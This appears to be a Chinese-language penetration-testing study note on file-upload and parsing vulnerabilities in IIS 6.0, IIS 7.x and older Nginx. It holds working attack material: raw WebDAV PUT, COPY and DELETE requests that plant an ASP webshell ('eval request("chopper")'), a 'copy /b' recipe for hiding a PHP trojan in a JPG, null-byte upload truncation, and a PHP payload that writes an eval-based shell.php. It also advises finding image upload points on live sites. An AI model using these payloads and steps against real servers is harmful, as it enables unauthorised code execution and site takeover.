IIS6.0 解析漏洞
1.在网站目录中如果存在名为*.asp、*asa的目录,那么该目录下内的任何文件都会被解析成asp文件被执行。
2.再上传图片木马的时候,将文件名改为*.asp;,jpg,该文件文件都会被IIS解析为asp文件执行。
3.还有IIS6.0 默认的可执行文件除了asp还包含这三种/wooyun.cer、/wooyun.asa、/wooyun.cdx
4.(转载)WebDav漏洞(对IIS写权限的利用,这个我们在之前学http请求的时候就说过的请求头和正文语句,这段好好看)
- 第一步,通过OPTIONS探测服务器所支持的HTTP方法
请求:
OPTIONS / HTTP/1.1
Host:www.example.com
响应:
Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH
- 第二步,通过PUT方法向服务器上传脚本文件
请求:
PUT /a.txt HTTP/1.1
Host:www.example.com
Content-Length:30
<%eval request("chopper")%>
第三步,通过Move或Copy方法改名
请求:
COPY /a.txt HTTP/1.1
Host:www.example.com
Destination:http://www.example.com/cmd.asp
第四步,使用DELETE方法,攻击者还可以删除服务器上的任意文件
请求:
DELETE /a.txt HTTP/1.1
Host:www.example.com
5.当你上传的木马如asp/aspx,必须在IIS6.0环境,且在以x.asp为名称的文件夹下面,才能执行图片里的代码,也就是说,图片木马执行必须满足2个条件:A:有x.asp文件夹;B:图片木马在x.asp文件夹下,那么怎么去达到这种目的就需要奇艺技巧了,常见的是通过%00截断和一些个更改上传时候的属性。(下面会讲到)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
图片木马制作方法
使用CMD制作一句话木马。
参数/b指定以二进制格式复制、合并文件; 用于图像类/声音类文件
参数/a指定以ASCII格式复制、合并文件。用于txt等文档类文件
copy 1.jpg/b+1.php 2.jpg
//意思是将1.jpg以二进制与1.php合并成2.jpg
那么2.jpg就是图片木马了。
--------------------------------------------------------------------------------------------------
查看数据包,其中Content-Disposition:form-data;name=”path”
下面的一行为服务保存文件的相对路径,我们把原本的 uploadimg/
改为 uploadimg/1.php;
。
---------------------------------------------------------------------------------------------------
截断上传,是借助%00截断上传使%00后面的字串被忽略,如:1.asp.jpg=1.asp%00.jpg,从而成功上传shell。
---------------------------------------------------------------------------------------------------
二、IIS7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
找到使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.jpg/. php随便你怎么填。只要后缀为.php就好。如(http://192.168.1.1/upload/1.jpg/.php)
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>然后访问sp.jpg/.php,在这个目录下就会生成一句话木马 shell.php